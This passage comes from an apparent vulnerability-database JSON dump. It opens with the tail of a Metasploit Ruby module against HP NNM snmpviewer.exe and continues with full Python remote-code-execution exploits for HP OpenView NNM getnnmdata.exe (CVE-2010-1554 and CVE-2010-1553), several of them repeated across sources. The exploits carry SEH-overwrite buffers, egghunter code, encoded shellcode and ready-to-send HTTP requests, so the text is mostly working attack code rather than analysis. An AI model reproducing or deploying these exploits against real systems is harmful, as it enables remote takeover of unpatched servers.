\ndistance = seh_offset - start.length + seh_frame.length # dry run \njmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string \ndistance = seh_offset - start.length - jmp_back.length \ndistance += 8 if ins == 'content' \njmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string \n \n# A short jump back to the long jump back :) \njmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string \n \n# Fix up the SEH frame \nseh_frame[0,jmp_small.length] = jmp_small \nseh_frame[4,4] = [target.ret].pack('V') \n \n# Create the buffer \nbuf = '' \nbuf << payload.encoded \npad = seh_offset - start.length - buf.length - jmp_back.length \npad += 8 if ins == 'content' \nbuf << rand_text(pad) \nbuf << jmp_back \nbuf << seh_frame \n \napp = buf \n \n# Force an exception writing off the end of the stack \naction = rand_text(1024) \n \n# Send the request \nif rand(2) > 0 \nprint_status(\"Sending exploit via POST request (ins=#{ins})...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"POST\", \n'vars_post' => \n{ \n'ins' => ins, \n'act' => action, \n'app' => app \n} \n}, 3) \nelse \nprint_status(\"Sending exploit via GET request (ins=#{ins})...\") \nres = send_request_cgi({ \n'uri' => cgi, \n'method' => \"GET\", \n'vars_get' => \n{ \n'ins' => ins, \n'act' => action, \n'app' => app \n} \n}, 3) \nend \n \nif res and res.code != 502 \nprint_error(\"Eek! 
We weren't expecting a response, but we got one\") \nprint_status(res.inspect) if datastore['NNM_DEBUG'] \nend \n \nhandler \n \nend \n \ndef wfs_delay \n5 \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99673/hp_nnm_snmpviewer_actapp.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:19", "description": "\nHP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution", "edition": 1, "published": "2010-07-02T00:00:00", "title": "HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-02T00:00:00", "id": "EXPLOITPACK:481659315559426EECC8DE2DE311E620", "href": "", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \n# Date: 2010.07.02\n# Author: S2 Crew [Hungary]\n# Software Link: hp.com\n# Version: 7.53\n# Tested on: Windows 2003\n# CVE: CVE-2010-1554\n\n# Code :\n\n#!/usr/bin/python\n\nimport struct\nimport socket\nimport httplib\nimport urllib\n\n# calc.exe Windows Execute Command\nsc2 = 
(\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\
\x6b\\x42\\x4f\\x4b\\x37\"\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\n)\n\negghunter = (\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\"\n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\"\n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\n)\n\nret = struct.pack('<L',0x5A667A77) # ppr\njmp1 = '\\xeb\\xf9\\x90\\x90'\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\n\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500\n\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\n\nc = httplib.HTTPConnection('172.16.29.149')\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\nr = c.getresponse()\n\nprint r.status, r.reason\ndata = r.read()\nprint data\nc.close()\n\nprint \"\\nDone\\n\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:19", "description": "\nHP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "edition": 1, "published": "2010-07-02T00:00:00", "title": "HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-02T00:00:00", "id": "EXPLOITPACK:11DF6F45B49D83BD88A199FB4D372A38", "href": "", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \n# Date: 2010.07.02\n# Author: S2 Crew [Hungary]\n# Software Link: 
hp.com\n# Version: 7.53\n# Tested on: Windows 2003\n# CVE: CVE-2010-1553\n\n# Code :\n\n#!/usr/bin/python\n\nimport struct\nimport socket\nimport httplib\nimport urllib\n\n# calc.exe Windows Execute Command\nsc2 = (\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\n\
"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\n)\n\negghunter = (\n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\"\n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\"\n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\"\n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\"\n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\"\n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\"\n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\"\n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\"\n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\"\n)\n\nret = struct.pack('<L',0x5A667A77) # ppr\njmp = \"\\x74\\x21\\x44\\x44\"\n\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\n\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\n\nc = httplib.HTTPConnection('172.16.29.149')\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\nr = c.getresponse()\n\nprint r.status, r.reason\ndata = r.read()\nprint data\nc.close()\n\nprint \"\\nDone\\n\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": 
[{"lastseen": "2017-11-19T15:29:10", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69250", "id": "SSV:69250", "sourceData": "\n # Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1554\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a"\r\n"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41"\r\n"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42"\r\n"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b"\r\n"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79"\r\n"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e"\r\n"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42"\r\n"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44"\r\n"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c"\r\n"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c"\r\n"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62"\r\n"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b"\r\n"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58"\r\n"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47"\r\n"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\
x4b\\x45\\x51\\x4a\\x76\\x46\\x51"\r\n"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45"\r\n"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d"\r\n"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c"\r\n"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c"\r\n"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47"\r\n"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64"\r\n"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49"\r\n"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56"\r\n"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45"\r\n"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37"\r\n"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50"\r\n"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c"\r\n"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45"\r\n"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50"\r\n"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46"\r\n"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41"\r\n)\r\n\r\negghunter = (\r\n"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a"\r\n"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74"\r\n"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa"\r\n"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp1 = '\\xeb\\xf9\\x90\\x90'\r\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\r\n\r\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + "C"*500\r\n\r\nh = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request("POST","/OvCgi/getnnmdata.exe",p,h)\r\nr = 
c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint "\\nDone\\n" \r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69250"}, {"lastseen": "2017-11-19T15:27:52", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-69249", "id": "SSV:69249", "sourceData": "\n # Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1553\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = 
(\r\n"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a"\r\n"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41"\r\n"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42"\r\n"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b"\r\n"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79"\r\n"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e"\r\n"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42"\r\n"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44"\r\n"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c"\r\n"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c"\r\n"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62"\r\n"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b"\r\n"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58"\r\n"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47"\r\n"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51"\r\n"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45"\r\n"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d"\r\n"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c"\r\n"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c"\r\n"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47"\r\n"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64"\r\n"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49"\r\n"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56"\r\n"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45"\r\n"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e
\\x6b\\x42\\x4f\\x4b\\x37"\r\n"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50"\r\n"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c"\r\n"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45"\r\n"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50"\r\n"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46"\r\n"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41"\r\n)\r\n\r\negghunter = (\r\n"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49"\r\n"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a"\r\n"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32"\r\n"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49"\r\n"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43"\r\n"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a"\r\n"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c"\r\n"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47"\r\n"\\x49\\x6f\\x4b\\x57\\x41\\x41"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp = "\\x74\\x21\\x44\\x44"\r\n\r\np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter\r\n\r\nh = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request("POST","/OvCgi/getnnmdata.exe",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint "\\nDone\\n" \r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-69249"}], "d2": [{"lastseen": "2019-05-29T17:19:06", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], 
